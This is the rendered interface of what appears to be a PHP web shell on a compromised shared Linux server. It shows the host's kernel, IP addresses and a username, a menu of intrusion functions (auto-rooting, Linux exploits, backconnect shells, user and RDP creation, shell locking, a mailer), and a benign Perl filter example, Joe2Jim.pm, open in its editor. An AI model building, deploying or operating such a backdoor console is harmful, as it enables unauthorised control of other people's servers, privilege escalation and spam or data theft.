Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libfilter-perl /
examples /
method /
[ HOME SHELL ]
Name
Size
Permission
Action
Count.pm
466
B
-rw-r--r--
Decompress.pm
616
B
-rw-r--r--
Joe2Jim.pm
281
B
-rw-r--r--
NewSubst.pm
763
B
-rw-r--r--
Subst.pm
428
B
-rw-r--r--
UUdecode.pm
813
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Joe2Jim.pm
package Joe2Jim ; use Filter::Util::Call ; use strict ; use warnings ; sub import { my($type) = @_ ; filter_add(bless []) ; } sub filter { my($self) = @_ ; my($status) ; s/Joe/Jim/g if ($status = filter_read()) > 0 ; $status ; } 1 ;
Close